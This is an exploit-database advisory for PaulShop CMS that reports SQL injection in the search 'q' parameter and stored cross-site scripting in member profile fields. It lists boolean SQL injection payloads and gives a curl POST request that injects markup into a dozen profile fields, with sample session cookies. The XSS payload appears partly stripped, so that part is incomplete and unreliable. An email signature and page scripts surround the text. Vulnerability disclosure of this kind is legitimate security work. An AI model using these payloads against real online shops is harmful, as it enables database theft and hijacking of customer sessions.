PaulShop - SQL Injection / Cross-Site Scripting
2017-07-24 15:05:20# Exploit Title: PaulShop CMS - Sql Injection and stored XSS
# Date: 07/23/2017
# Exploit Author: BTIS Team (http://www.btis.vn)
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: 03/27/2017
# Tested on: Apache/2.4.7 (Ubuntu)
# Contact: <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="d4a6b1a7b1b5a6b7bc94b6a0bda7faa2ba">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>
# Can not contact vendor
1. Description
- SQL Injection on Search page with "q" parameter (GET)
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]
2. Examples
- SQL injection:
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]
# Payload: - True condition: europe' and 1=1)-- -
- False condition: europe' and 1=0)-- -
- Stored XSS:
# Payload: ">
# curl -X POST \
'http://localhost/shop/en/account?save=1' \
-H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
-b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
-d '[email protected]&password=123456xyz&firstname=BTIS">&lastname=VN">&address=address">&city=city">&state=HCM">&zipcode=700000">&country=VN&phone=">&fax=fax">&delivery[address]=adr2">&delivery[city]=city2">&delivery[state]=MNB">&delivery[zipcode]=800000">&delivery[country]=AD&save=Save'
Quan Minh Tâm / Trưởng phòng kỹ thuật
<mailto:<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="1165707c607c51736578623f677f">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>> <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="3743565a465a7755435e44194159">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> / 01284 211 290
CÔNG TY CÔNG NGHỆ BẢO TÍN
028 3810 6288 – 028 38106289
5A Trần Văn Dư, phường 13, quận Tân Bình, Tp.Hồ Chí Minh
<http://www.btis.vn> www.btis.vn
Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard.
Để biết thêm thông tin, hãy truy cập www.bullguard.com <http://www.bullguard.com/tracking.aspx?affiliate=bullguard&buyaffiliate=smtp&url=/>
Fixes
No fixesIn order to submit a new fix you need to be registered.